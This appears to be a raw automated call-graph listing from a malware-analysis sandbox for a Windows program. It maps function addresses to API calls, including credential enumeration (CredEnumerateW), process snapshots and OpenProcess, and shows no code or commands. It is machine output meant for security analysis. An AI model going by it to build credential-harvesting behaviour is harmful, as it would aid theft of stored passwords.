38388->38316 38389->38297 38391 41703f 11 API calls 38390->38391 38392 43847a 38391->38392 38393 43848a 38392->38393 38394 43847e 38392->38394 38396 438270 134 API calls 38393->38396 38395 4446ea 11 API calls 38394->38395 38398 438488 38395->38398 38397 4384aa 38396->38397 38397->38398 38399 424f26 123 API calls 38397->38399 38398->38330 38400 4384bb 38399->38400 38401 438270 134 API calls 38400->38401 38401->38398 38402->38322 38403->38332 38404->38329 38405->38322 38406->38322 38408 41bc3b 101 API calls 38407->38408 38409 41f1b4 38408->38409 38410 41edad 86 API calls 38409->38410 38417 41f282 38409->38417 38411 41f1cb 38410->38411 38412 41f1f5 memcmp 38411->38412 38413 41f20e 38411->38413 38411->38417 38412->38413 38414 41f21b memcmp 38413->38414 38413->38417 38415 41f326 38414->38415 38418 41f23d 38414->38418 38416 41ee6b 86 API calls 38415->38416 38415->38417 38416->38417 38417->38341 38418->38415 38419 41f28e memcmp 38418->38419 38421 41c8df 56 API calls 38418->38421 38419->38415 38420 41f2a9 38419->38420 38420->38415 38423 41f308 38420->38423 38424 41f2d8 38420->38424 38422 41f269 38421->38422 38422->38415 38425 41f287 38422->38425 38426 41f27a 38422->38426 38423->38415 38430 4446ce 11 API calls 38423->38430 38427 41ee6b 86 API calls 38424->38427 38425->38419 38428 41ee6b 86 API calls 38426->38428 38429 41f2e0 38427->38429 38428->38417 38431 41b1ca memset 38429->38431 38430->38415 38431->38417 38432->38341 38433->38341 38434->38341 38435->38335 38436->38336 38438 417044 38437->38438 38439 41705c 38437->38439 38441 416760 11 API calls 38438->38441 38443 417055 38438->38443 38440 417075 38439->38440 38442 41707a 11 API calls 38439->38442 38440->38347 38441->38443 38442->38438 38443->38347 38445 41693e 38444->38445 38449 41698e 38444->38449 38446 41694c 38445->38446 38447 422fd1 memset 38445->38447 38448 4165a0 11 API calls 38446->38448 38446->38449 38447->38446 38450 416972 38448->38450 38449->38353 38450->38449 38451 422b84 15 API calls 38450->38451 38451->38449 38453 424f07 11 API calls 38452->38453 38454 4251e4 38453->38454 38455 4251f7 38454->38455 38456 4251e8 38454->38456 38459 4250f8 127 API calls 38455->38459 38457 4446ea 11 API calls 38456->38457 38458 4251f2 38457->38458 38458->38353 38460 425209 38459->38460 38462 425249 38460->38462 38463 4384e9 135 API calls 38460->38463 38464 424f74 124 API calls 38460->38464 38466 4250f8 127 API calls 38460->38466 38467 425287 38460->38467 38461 415c7d 16 API calls 38461->38458 38465 424ff0 13 API calls 38462->38465 38462->38467 38463->38460 38464->38460 38468 425266 38465->38468 38466->38460 38467->38461 38468->38467 38469 415be9 memcpy 38468->38469 38469->38467 38470->38350 38471->38353 38472->38353 38473->38353 38474->38353 38475->38353 38476->38371 38477->38355 38479 415c81 38478->38479 38481 415c9c 38478->38481 38480 416935 16 API calls 38479->38480 38479->38481 38480->38481 38481->38350 38482 4442e6 38481->38482 38483 4442eb 38482->38483 38486 444303 38482->38486 38484 41707a 11 API calls 38483->38484 38485 4442f2 38484->38485 38485->38486 38487 4446ea 11 API calls 38485->38487 38486->38361 38488 444300 38487->38488 38488->38361 38489->38369 38490->38379 38491->38385 38497 415cfe 38492->38497 38498 41628e 38497->38498 38504 415d23 __aullrem __aulldvrm 38497->38504 38505 416520 38498->38505 38499 4163ca 38511 416422 11 API calls 38499->38511 38501 416172 memset 38501->38504 38502 416422 10 API calls 38502->38504 38503 415cb9 10 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 416527 38505->38506 38510 416574 38505->38510 38508 416544 38506->38508 38506->38510 38512 4156aa 11 API calls 38506->38512 38509 416561 memcpy 38508->38509 38508->38510 38509->38510 38510->38250 38511->38498 38512->38508 38513->38022 38514->38028 38515->38038 38516->38040 38517->38037 38518->38041 38519->38040 38520->38045 38521->38047 38522->38049 38523->38051 38524->38053 38525->38055 38526->38057 38527->38064 38528->38067 38529->38071 38530->38072 38531->38075 38532->38075 38533->38087 38534->38087 38535->38093 38536->38086 38539 44080f 38537->38539 38540 4407a1 38537->38540 38539->38064 38547 43dfff memset 38540->38547 38541->38093 38542->38093 38543->38093 38544->38093 38545->38093 38546->38082 38547->38539 38548->38102 38549->38101 38551->38129 38552->38127 38553->38135 38554->38127 38555->38142 38556->38127 38557->38127 38558->38136 38559->38127 38560->38127 38561->38127 38562->38127 38563->38127 38564->38098 38565->38145 38574 4238ad memset memcpy 38566->38574 38568 423ca5 38569 415a91 memset 38568->38569 38570 423cc3 38569->38570 38570->38162 38571->38162 38572->38162 38573->38156 38574->38568 38575 41276d 38576 41277d 38575->38576 38618 4044a4 LoadLibraryW 38576->38618 38578 412785 38579 412789 38578->38579 38626 414b81 38578->38626 38582 4127c8 38632 412465 memset ??2@YAPAXI 38582->38632 38584 4127ea 38644 40ac21 38584->38644 38589 412813 38662 40dd07 memset 38589->38662 38590 412827 38667 40db69 memset 38590->38667 38593 412822 38688 4125b6 ??3@YAXPAX 38593->38688 38595 40ada2 _wcsicmp 38597 41283d 38595->38597 38597->38593 38600 412863 CoInitialize 38597->38600 38672 41268e 38597->38672 38692 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38600->38692 38602 41296f 38694 40b633 38602->38694 38605 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38610 412957 38605->38610 38615 4128ca 38605->38615 38610->38593 38611 4128d0 TranslateAcceleratorW 38612 412941 GetMessageW 38611->38612 38611->38615 38612->38610 38612->38611 38613 412909 IsDialogMessageW 38613->38612 38613->38615 38614 4128fd IsDialogMessageW 38614->38612 38614->38613 38615->38611 38615->38613 38615->38614 38616 41292b TranslateMessage DispatchMessageW 38615->38616 38617 41291f IsDialogMessageW 38615->38617 38616->38612 38617->38612 38617->38616 38619 4044cf GetProcAddress 38618->38619 38623 4044f7 38618->38623 38620 4044e8 FreeLibrary 38619->38620 38621 4044df 38619->38621 38622 4044f3 38620->38622 38620->38623 38621->38620 38622->38623 38624 404507 MessageBoxW 38623->38624 38625 40451e 38623->38625 38624->38578 38625->38578 38627 414b8a 38626->38627 38628 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38626->38628 38698 40a804 memset 38627->38698 38628->38582 38631 414b9e GetProcAddress 38631->38628 38633 4124e0 38632->38633 38634 412505 ??2@YAPAXI 38633->38634 38635 41251c 38634->38635 38637 412521 38634->38637 38720 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38635->38720 38709 444722 38637->38709 38643 41259b wcscpy 38643->38584 38725 40b1ab ??3@YAXPAX ??3@YAXPAX 38644->38725 38646 40ad76 38726 40aa04 38646->38726 38649 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38652 40ac5c 38649->38652 38650 40ad4b 38650->38646 38749 40a9ce 38650->38749 38652->38646 38652->38649 38652->38650 38653 40ace7 ??3@YAXPAX 38652->38653 38729 40a8d0 38652->38729 38741 4099f4 38652->38741 38653->38652 38657 40a8d0 7 API calls 38657->38646 38658 40ada2 38659 40adaa 38658->38659 38660 40adc9 38658->38660 38659->38660 38661 40adb3 _wcsicmp 38659->38661 38660->38589 38660->38590 38661->38659 38661->38660 38754 40dce0 38662->38754 38664 40dd3a GetModuleHandleW 38759 40dba7 38664->38759 38668 40dce0 3 API calls 38667->38668 38669 40db99 38668->38669 38831 40dae1 38669->38831 38845 402f3a 38672->38845 38674 412766 38674->38593 38674->38600 38675 4126d3 _wcsicmp 38676 4126a8 38675->38676 38676->38674 38676->38675 38678 41270a 38676->38678 38879 4125f8 7 API calls 38676->38879 38678->38674 38848 411ac5 38678->38848 38689 4125da 38688->38689 38690 4125f0 38689->38690 38691 4125e6 DeleteObject 38689->38691 38693 40b1ab ??3@YAXPAX ??3@YAXPAX 38690->38693 38691->38690 38692->38605 38693->38602 38695 40b640 38694->38695 38696 40b639 ??3@YAXPAX 38694->38696 38697 40b1ab ??3@YAXPAX ??3@YAXPAX 38695->38697 38696->38695 38697->38579 38699 40a83b GetSystemDirectoryW 38698->38699 38700 40a84c wcscpy 38698->38700 38699->38700 38705 409719 wcslen 38700->38705 38703 40a881 LoadLibraryW 38704 40a886 38703->38704 38704->38628 38704->38631 38706 409724 38705->38706 38707 409739 wcscat LoadLibraryW 38705->38707 38706->38707 38708 40972c wcscat 38706->38708 38707->38703 38707->38704 38708->38707 38710 444732 38709->38710 38711 444728 DeleteObject 38709->38711 38721 409cc3 38710->38721 38711->38710 38713 412551 38714 4010f9 38713->38714 38715 401130 38714->38715 38716 401134 GetModuleHandleW LoadIconW 38715->38716 38717 401107 wcsncat 38715->38717 38718 40a7be 38716->38718 38717->38715 38719 40a7d2 38718->38719 38719->38643 38719->38719 38720->38637 38724 409bfd memset wcscpy 38721->38724 38723 409cdb CreateFontIndirectW 38723->38713 38724->38723 38725->38652 38727 40aa14 38726->38727 38728 40aa0a ??3@YAXPAX 38726->38728 38727->38658 38728->38727 38730 40a8eb 38729->38730 38731 40a8df wcslen 38729->38731 38732 40a906 ??3@YAXPAX 38730->38732 38733 40a90f 38730->38733 38731->38730 38734 40a919 38732->38734 38735 4099f4 3 API calls 38733->38735 38736 40a932 38734->38736 38737 40a929 ??3@YAXPAX 38734->38737 38735->38734 38739 4099f4 3 API calls 38736->38739 38738 40a93e memcpy 38737->38738 38738->38652 38740 40a93d 38739->38740 38740->38738 38742 409a41 38741->38742 38743 4099fb malloc 38741->38743 38742->38652 38745 409a37 38743->38745 38746 409a1c 38743->38746 38745->38652 38747 409a30 ??3@YAXPAX 38746->38747 38748 409a20 memcpy 38746->38748 38747->38745 38748->38747 38750 40a9e7 38749->38750 38751 40a9dc ??3@YAXPAX 38749->38751 38753 4099f4 3 API calls 38750->38753 38752 40a9f2 38751->38752 38752->38657 38753->38752 38778 409bca GetModuleFileNameW 38754->38778 38756 40dce6 wcsrchr 38757 40dcf5 38756->38757 38758 40dcf9 wcscat 38756->38758 38757->38758 38758->38664 38779 44db70 38759->38779 38763 40dbfd 38782 4447d9 38763->38782 38766 40dc34 wcscpy wcscpy 38808 40d6f5 38766->38808 38767 40dc1f wcscpy 38767->38766 38770 40d6f5 3 API calls 38771 40dc73 38770->38771 38772 40d6f5 3 API calls 38771->38772 38773 40dc89 38772->38773 38774 40d6f5 3 API calls 38773->38774 38775 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38774->38775 38814 40da80 38775->38814 38778->38756 38780 40dbb4 memset memset 38779->38780 38781 409bca GetModuleFileNameW 38780->38781 38781->38763 38783 4447f4 38782->38783 38784 40dc1b 38783->38784 38785 444807 ??2@YAPAXI 38783->38785 38784->38766 38784->38767 38786 44481f 38785->38786 38787 444873 _snwprintf 38786->38787 38788 4448ab wcscpy 38786->38788 38821 44474a 8 API calls 38787->38821 38790 4448bb 38788->38790 38822 44474a 8 API calls 38790->38822 38791 4448a7 38791->38788 38791->38790 38793 4448cd 38823 44474a 8 API calls 38793->38823 38795 4448e2 38824 44474a 8 API calls 38795->38824 38797 4448f7 38825 44474a 8 API calls 38797->38825 38799 44490c 38826 44474a 8 API calls 38799->38826 38801 444921 38827 44474a 8 API calls 38801->38827 38803 444936 38828 44474a 8 API calls 38803->38828 38805 44494b 38829 44474a 8 API calls 38805->38829 38807 444960 ??3@YAXPAX 38807->38784 38809 44db70 38808->38809 38810 40d702 memset GetPrivateProfileStringW 38809->38810 38811 40d752 38810->38811 38812 40d75c WritePrivateProfileStringW 38810->38812 38811->38812 38813 40d758 38811->38813 38812->38813 38813->38770 38815 44db70 38814->38815 38816 40da8d memset 38815->38816 38817 40daac LoadStringW 38816->38817 38818 40dac6 38817->38818 38818->38817 38820 40dade 38818->38820 38830 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38818->38830 38820->38593 38821->38791 38822->38793 38823->38795 38824->38797 38825->38799 38826->38801 38827->38803 38828->38805 38829->38807 38830->38818 38841 409b98 GetFileAttributesW 38831->38841 38833 40daea 38834 40daef wcscpy wcscpy GetPrivateProfileIntW 38833->38834 38840 40db63 38833->38840 38842 40d65d GetPrivateProfileStringW 38834->38842 38836 40db3e 38843 40d65d GetPrivateProfileStringW 38836->38843 38838 40db4f 38844 40d65d GetPrivateProfileStringW 38838->38844 38840->38595 38841->38833 38842->38836 38843->38838 38844->38840 38880 40eaff 38845->38880 38849 411ae2 memset 38848->38849 38850 411b8f 38848->38850 38920 409bca GetModuleFileNameW 38849->38920 38862 411a8b 38850->38862 38852 411b0a wcsrchr 38853 411b22 wcscat 38852->38853 38854 411b1f 38852->38854 38921 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38853->38921 38854->38853 38856 411b67 38922 402afb 38856->38922 38860 411b7f 38978 40ea13 SendMessageW memset SendMessageW 38860->38978 38863 402afb 27 API calls 38862->38863 38864 411ac0 38863->38864 38865 4110dc 38864->38865 38866 41113e 38865->38866 38871 4110f0 38865->38871 39003 40969c LoadCursorW SetCursor 38866->39003 38868 411143 39004 4032b4 38868->39004 39022 444a54 38868->39022 38869 4110f7 _wcsicmp 38869->38871 38870 411157 38872 40ada2 _wcsicmp 38870->38872 38871->38866 38871->38869 39025 410c46 10 API calls 38871->39025 38875 411167 38872->38875 38873 4111af 38875->38873 38876 4111a6 qsort 38875->38876 38876->38873 38879->38676 38881 40eb10 38880->38881 38893 40e8e0 38881->38893 38884 40eb6c memcpy memcpy 38885 40ebb7 38884->38885 38885->38884 38886 40d134 16 API calls 38885->38886 38887 40ebf2 ??2@YAPAXI ??2@YAPAXI 38885->38887 38886->38885 38888 40ec65 38887->38888 38889 40ec2e ??2@YAPAXI 38887->38889 38903 40ea7f 38888->38903 38889->38888 38892 402f49 38892->38676 38894 40e8f2 38893->38894 38895 40e8eb ??3@YAXPAX 38893->38895 38896 40e900 38894->38896 38897 40e8f9 ??3@YAXPAX 38894->38897 38895->38894 38898 40e911 38896->38898 38899 40e90a ??3@YAXPAX 38896->38899 38897->38896 38900 40e931 ??2@YAPAXI ??2@YAPAXI 38898->38900 38901 40e921 ??3@YAXPAX 38898->38901 38902 40e92a ??3@YAXPAX 38898->38902 38899->38898 38900->38884 38901->38902 38902->38900 38904 40aa04 ??3@YAXPAX 38903->38904 38905 40ea88 38904->38905 38906 40aa04 ??3@YAXPAX 38905->38906 38907 40ea90 38906->38907 38908 40aa04 ??3@YAXPAX 38907->38908 38909 40ea98 38908->38909 38910 40aa04 ??3@YAXPAX 38909->38910 38911 40eaa0 38910->38911 38912 40a9ce 4 API calls 38911->38912 38913 40eab3 38912->38913 38914 40a9ce 4 API calls 38913->38914 38915 40eabd 38914->38915 38916 40a9ce 4 API calls 38915->38916 38917 40eac7 38916->38917 38918 40a9ce 4 API calls 38917->38918 38919 40ead1 38918->38919 38919->38892 38920->38852 38921->38856 38979 40b2cc 38922->38979 38924 402b0a 38925 40b2cc 27 API calls 38924->38925 38926 402b23 38925->38926 38927 40b2cc 27 API calls 38926->38927 38928 402b3a 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402b54 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402b6b 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402b82 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402b99 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402bb0 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402bc7 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402bde 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402bf5 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402c0c 38945->38946 38947 40b2cc 27 API calls 38946->38947 38948 402c23 38947->38948 38949 40b2cc 27 API calls 38948->38949 38950 402c3a 38949->38950 38951 40b2cc 27 API calls 38950->38951 38952 402c51 38951->38952 38953 40b2cc 27 API calls 38952->38953 38954 402c68 38953->38954 38955 40b2cc 27 API calls 38954->38955 38956 402c7f 38955->38956 38957 40b2cc 27 API calls 38956->38957 38958 402c99 38957->38958 38959 40b2cc 27 API calls 38958->38959 38960 402cb3 38959->38960 38961 40b2cc 27 API calls 38960->38961 38962 402cd5 38961->38962 38963 40b2cc 27 API calls 38962->38963 38964 402cf0 38963->38964 38965 40b2cc 27 API calls 38964->38965 38966 402d0b 38965->38966 38967 40b2cc 27 API calls 38966->38967 38968 402d26 38967->38968 38969 40b2cc 27 API calls 38968->38969 38970 402d3e 38969->38970 38971 40b2cc 27 API calls 38970->38971 38972 402d59 38971->38972 38973 40b2cc 27 API calls 38972->38973 38974 402d78 38973->38974 38975 40b2cc 27 API calls 38974->38975 38976 402d93 38975->38976 38977 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38976->38977 38977->38860 38978->38850 38982 40b58d 38979->38982 38981 40b2d1 38981->38924 38983 40b5a4 GetModuleHandleW FindResourceW 38982->38983 38984 40b62e 38982->38984 38985 40b5c2 LoadResource 38983->38985 38987 40b5e7 38983->38987 38984->38981 38986 40b5d0 SizeofResource LockResource 38985->38986 38985->38987 38986->38987 38987->38984 38995 40afcf 38987->38995 38989 40b608 memcpy 38998 40b4d3 memcpy 38989->38998 38991 40b61e 38999 40b3c1 18 API calls 38991->38999 38993 40b626 39000 40b04b 38993->39000 38996 40b04b ??3@YAXPAX 38995->38996 38997 40afd7 ??2@YAPAXI 38996->38997 38997->38989 38998->38991 38999->38993 39001 40b051 ??3@YAXPAX 39000->39001 39002 40b05f 39000->39002 39001->39002 39002->38984 39003->38868 39005 4032c4 39004->39005 39006 4032d4 EntryPoint 39005->39006 39007 403322 39006->39007 39026 44553b 39007->39026 39011 403480 39222 40368c 15 API calls 39011->39222 39013 403489 39014 40b633 ??3@YAXPAX 39013->39014 39015 403495 39014->39015 39015->38870 39016 4033a9 memset memcpy 39017 4033ec wcscmp 39016->39017 39018 40333c 39016->39018 39017->39018 39018->39011 39018->39016 39018->39017 39220 4028e7 11 API calls 39018->39220 39221 40f508 6 API calls 39018->39221 39020 403421 _wcsicmp 39020->39018 39023 444a64 FreeLibrary 39022->39023 39024 444a83 39022->39024 39023->39024 39024->38870 39025->38871 39027 445548 39026->39027 39028 445599 39027->39028 39223 40c768 39027->39223 39029 4455a8 memset 39028->39029 39037 4457f2 39028->39037 39306 403988 39029->39306 39035 4455e5 39046 445672 39035->39046 39052 44560f 39035->39052 39040 445854 39037->39040 39408 403e2d memset memset memset memset memset 39037->39408 39038 4458bb memset memset 39043 414c2e 17 API calls 39038->39043 39089 4458aa 39040->39089 39431 403c9c memset memset memset memset memset 39040->39431 39042 44595e memset memset 39049 414c2e 17 API calls 39042->39049 39044 4458f9 39043->39044 39050 40b2cc 27 API calls 39044->39050 39317 403fbe memset memset memset memset memset 39046->39317 39047 445a00 memset memset 39454 414c2e 39047->39454 39048 445b22 39054 445bca 39048->39054 39055 445b38 memset memset memset 39048->39055 39059 44599c 39049->39059 39060 445909 39050->39060 39051 44557a 39086 44558c 39051->39086 39504 41366b FreeLibrary 39051->39504 39063 4087b3 338 API calls 39052->39063 39053 445849 39519 40b1ab ??3@YAXPAX ??3@YAXPAX 39053->39519 39061 445c8b memset memset 39054->39061 39128 445cf0 39054->39128 39064 445bd4 39055->39064 39065 445b98 39055->39065 39068 40b2cc 27 API calls 39059->39068 39069 409d1f 6 API calls 39060->39069 39073 414c2e 17 API calls 39061->39073 39062 44589f 39520 40b1ab ??3@YAXPAX ??3@YAXPAX 39062->39520 39070 445621 39063->39070 39079 414c2e 17 API calls 39064->39079 39065->39064 39075 445ba2 39065->39075 39072 4459ac 39068->39072 39083 445919 39069->39083 39505 4454bf 20 API calls 39070->39505 39071 445823 39071->39053 39094 4087b3 338 API calls 39071->39094 39084 409d1f 6 API calls 39072->39084 39085 445cc9 39073->39085 39592 4099c6 wcslen 39075->39592 39076 4456b2 39507 40b1ab ??3@YAXPAX ??3@YAXPAX 39076->39507 39078 40b2cc 27 API calls 39090 445a4f 39078->39090 39092 445be2 39079->39092 39080 403335 39219 4452e5 45 API calls 39080->39219 39081 445d3d 39112 40b2cc 27 API calls 39081->39112 39082 445d88 memset memset memset 39095 414c2e 17 API calls 39082->39095 39521 409b98 GetFileAttributesW 39083->39521 39096 4459bc 39084->39096 39097 409d1f 6 API calls 39085->39097 39290 444b06 39086->39290 39087 445879 39087->39062 39108 4087b3 338 API calls 39087->39108 39089->39038 39113 44594a 39089->39113 39470 409d1f wcslen wcslen 39090->39470 39101 40b2cc 27 API calls 39092->39101 39094->39071 39105 445dde 39095->39105 39588 409b98 GetFileAttributesW 39096->39588 39107 445ce1 39097->39107 39098 445bb3 39595 445403 memset 39098->39595 39099 445680 39099->39076 39340 4087b3 memset 39099->39340 39102 445bf3 39101->39102 39111 409d1f 6 API calls 39102->39111 39103 445928 39103->39113 39522 40b6ef 39103->39522 39114 40b2cc 27 API calls 39105->39114 39612 409b98 GetFileAttributesW 39107->39612 39108->39087 39122 445c07 39111->39122 39123 445d54 _wcsicmp 39112->39123 39113->39042 39127 4459ed 39113->39127 39126 445def 39114->39126 39115 4459cb 39115->39127 39136 40b6ef 253 API calls 39115->39136 39119 40b2cc 27 API calls 39120 445a94 39119->39120 39475 40ae18 39120->39475 39121 44566d 39121->39037 39391 413d4c 39121->39391 39132 445389 259 API calls 39122->39132 39133 445d71 39123->39133 39198 445d67 39123->39198 39125 445665 39506 40b1ab ??3@YAXPAX ??3@YAXPAX 39125->39506 39134 409d1f 6 API calls 39126->39134 39127->39047 39127->39048 39128->39080 39128->39081 39128->39082 39129 445389 259 API calls 39129->39054 39138 445c17 39132->39138 39613 445093 23 API calls 39133->39613 39141 445e03 39134->39141 39136->39127 39137 4456d8 39143 40b2cc 27 API calls 39137->39143 39144 40b2cc 27 API calls 39138->39144 39140 44563c 39140->39125 39146 4087b3 338 API calls 39140->39146 39614 409b98 GetFileAttributesW 39141->39614 39142 40b6ef 253 API calls 39142->39080 39148 4456e2 39143->39148 39149 445c23 39144->39149 39145 445d83 39145->39080 39146->39140 39508 413fa6 _wcsicmp _wcsicmp 39148->39508 39153 409d1f 6 API calls 39149->39153 39151 445e12 39158 445e6b 39151->39158 39164 40b2cc 27 API calls 39151->39164 39156 445c37 39153->39156 39154 445aa1 39157 445b17 39154->39157 39172 445ab2 memset 39154->39172 39185 409d1f 6 API calls 39154->39185 39482 40add4 39154->39482 39487 445389 39154->39487 39496 40ae51 39154->39496 39155 4456eb 39160 4456fd memset memset memset memset 39155->39160 39161 4457ea 39155->39161 39162 445389 259 API calls 39156->39162 39589 40aebe 39157->39589 39616 445093 23 API calls 39158->39616 39509 409c70 wcscpy wcsrchr 39160->39509 39512 413d29 39161->39512 39167 445c47 39162->39167 39168 445e33 39164->39168 39174 40b2cc 27 API calls 39167->39174 39175 409d1f 6 API calls 39168->39175 39170 445e7e 39171 445f67 39170->39171 39180 40b2cc 27 API calls 39171->39180 39176 40b2cc 27 API calls 39172->39176 39178 445c53 39174->39178 39179 445e47 39175->39179 39176->39154 39177 409c70 2 API calls 39181 44577e 39177->39181 39182 409d1f 6 API calls 39178->39182 39615 409b98 GetFileAttributesW 39179->39615 39184 445f73 39180->39184 39186 409c70 2 API calls 39181->39186 39187 445c67 39182->39187 39189 409d1f 6 API calls 39184->39189 39185->39154 39190 44578d 39186->39190 39191 445389 259 API calls 39187->39191 39188 445e56 39188->39158 39194 445e83 memset 39188->39194 39192 445f87 39189->39192 39190->39161 39197 40b2cc 27 API calls 39190->39197 39191->39054 39619 409b98 GetFileAttributesW 39192->39619 39196 40b2cc 27 API calls 39194->39196 39199 445eab 39196->39199 39200 4457a8 39197->39200 39198->39080 39198->39142 39201 409d1f 6 API calls 39199->39201 39202 409d1f 6 API calls 39200->39202 39203 445ebf 39201->39203 39204 4457b8 39202->39204 39205 40ae18 9 API calls 39203->39205 39511 409b98 GetFileAttributesW 39204->39511 39215 445ef5 39205->39215 39207 4457c7 39207->39161 39209 4087b3 338 API calls 39207->39209 39208 40ae51 9 API calls 39208->39215 39209->39161 39210 445f5c 39212 40aebe FindClose 39210->39212 39211 40add4 2 API calls 39211->39215 39212->39171 39213 40b2cc 27 API calls 39213->39215 39214 409d1f 6 API calls 39214->39215 39215->39208 39215->39210 39215->39211 39215->39213 39215->39214 39217 445f3a 39215->39217 39617 409b98 GetFileAttributesW 39215->39617 39618 445093 23 API calls 39217->39618 39219->39018 39220->39020 39221->39018 39222->39013 39224 40c775 39223->39224 39620 40b1ab ??3@YAXPAX ??3@YAXPAX 39224->39620 39226 40c788 39621 40b1ab ??3@YAXPAX ??3@YAXPAX 39226->39621 39228 40c790 39622 40b1ab ??3@YAXPAX ??3@YAXPAX 39228->39622 39230 40c798 39231 40aa04 ??3@YAXPAX 39230->39231 39232 40c7a0 39231->39232 39623 40c274 memset 39232->39623 39237 40a8ab 9 API calls 39238 40c7c3 39237->39238 39239 40a8ab 9 API calls 39238->39239 39240 40c7d0 39239->39240 39652 40c3c3 39240->39652 39244 40c877 39253 40bdb0 39244->39253 39245 40c86c 39694 4053fe 39 API calls 39245->39694 39251 40c7e5 39251->39244 39251->39245 39252 40c634 50 API calls 39251->39252 39677 40a706 39251->39677 39252->39251 39923 404363 39253->39923 39256 40bf5d 39943 40440c 39256->39943 39257 40bdee 39257->39256 39261 40b2cc 27 API calls 39257->39261 39258 40bddf CredEnumerateW 39258->39257 39262 40be02 wcslen 39261->39262 39262->39256 39267 40be1e 39262->39267 39263 40be26 _wcsncoll 39263->39267 39266 40be7d memset 39266->39267 39268 40bea7 memcpy 39266->39268 39267->39256 39267->39263 39267->39266 39267->39268 39269 40bf11 wcschr 39267->39269 39270 40b2cc 27 API calls 39267->39270 39272 40bf43 LocalFree 39267->39272 39946 40bd5d 28 API calls 39267->39946 39947 404423 39267->39947 39268->39267 39268->39269 39269->39267 39271 40bef6 _wcsnicmp 39270->39271 39271->39267 39271->39269 39272->39267 39273 4135f7 39962 4135e0 39273->39962 39276 40b2cc 27 API calls 39277 41360d 39276->39277 39278 40a804 8 API calls 39277->39278 39279 413613 39278->39279 39280 41361b 39279->39280 39281 41363e 39279->39281 39282 40b273 27 API calls 39280->39282 39283 4135e0 FreeLibrary 39281->39283 39284 413625 GetProcAddress 39282->39284 39285 413643 39283->39285 39284->39281 39286 413648 39284->39286 39285->39051 39287 413658 39286->39287 39288 4135e0 FreeLibrary 39286->39288 39287->39051 39289 413666 39288->39289 39289->39051 39965 4449b9 39290->39965 39307 40399d 39306->39307 39991 403a16 39307->39991 39309 403a09 40005 40b1ab ??3@YAXPAX ??3@YAXPAX 39309->40005 39311 403a12 wcsrchr 39311->39035 39312 4039a3 39312->39309 39315 4039f4 39312->39315 40002 40a02c CreateFileW 39312->40002 39315->39309 39316 4099c6 2 API calls 39315->39316 39316->39309 39318 414c2e 17 API calls 39317->39318 39319 404048 39318->39319 39320 414c2e 17 API calls 39319->39320 39321 404056 39320->39321 39322 409d1f 6 API calls 39321->39322 39323 404073 39322->39323 39324 409d1f 6 API calls 39323->39324 39325 40408e 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 4040a6 39326->39327 39328 403af5 20 API calls 39327->39328 39329 4040ba 39328->39329 39330 403af5 20 API calls 39329->39330 39331 4040cb 39330->39331 40032 40414f memset 39331->40032 39333 404140 40046 40b1ab ??3@YAXPAX ??3@YAXPAX 39333->40046 39334 4040ec memset 39338 4040e0 39334->39338 39336 404148 39336->39099 39337 4099c6 2 API calls 39337->39338 39338->39333 39338->39334 39338->39337 39339 40a8ab 9 API calls 39338->39339 39339->39338 40059 40a6e6 WideCharToMultiByte 39340->40059 39342 4087ed 40060 4095d9 memset 39342->40060 39345 408809 memset memset memset memset memset 39346 40b2cc 27 API calls 39345->39346 39347 4088a1 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 4088b1 39348->39349 39372 408953 39372->39099 39392 40b633 ??3@YAXPAX 39391->39392 39393 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39392->39393 39394 413f00 Process32NextW 39393->39394 39395 413da5 OpenProcess 39394->39395 39396 413f17 CloseHandle 39394->39396 39397 413eb0 39395->39397 39398 413df3 memset 39395->39398 39396->39137 39397->39394 39400 413ebf ??3@YAXPAX 39397->39400 39401 4099f4 3 API calls 39397->39401 40324 413f27 39398->40324 39400->39397 39401->39397 39402 413e1f 39403 413e37 GetModuleHandleW 39402->39403 40329 413959 39402->40329 40345 413ca4 39402->40345 39403->39402 39405 413e46 GetProcAddress 39403->39405 39405->39402 39407 413ea2 CloseHandle 39407->39397 39409 414c2e 17 API calls 39408->39409 39410 403eb7 39409->39410 39411 414c2e 17 API calls 39410->39411 39412 403ec5 39411->39412 39413 409d1f 6 API calls 39412->39413 39414 403ee2 39413->39414 39415 409d1f 6 API calls 39414->39415 39416 403efd 39415->39416 39417 409d1f 6 API calls 39416->39417 39418 403f15 39417->39418 39419 403af5 20 API calls 39418->39419 39420 403f29 39419->39420 39421 403af5 20 API calls 39420->39421 39422 403f3a 39421->39422 39423 40414f 33 API calls 39422->39423 39429 403f4f 39423->39429 39424 403faf 40359 40b1ab ??3@YAXPAX ??3@YAXPAX 39424->40359 39426 403f5b memset 39426->39429 39427 403fb7 39427->39071 39428 4099c6 2 API calls 39428->39429 39429->39424 39429->39426 39429->39428 39430 40a8ab 9 API calls 39429->39430 39430->39429 39432 414c2e 17 API calls 39431->39432 39433 403d26 39432->39433 39434 414c2e 17 API calls 39433->39434 39435 403d34 39434->39435 39436 409d1f 6 API calls 39435->39436 39437 403d51 39436->39437 39438 409d1f 6 API calls 39437->39438 39439 403d6c 39438->39439 39440 409d1f 6 API calls 39439->39440 39441 403d84 39440->39441 39442 403af5 20 API calls 39441->39442 39443 403d98 39442->39443 39444 403af5 20 API calls 39443->39444 39445 403da9 39444->39445 39446 40414f 33 API calls 39445->39446 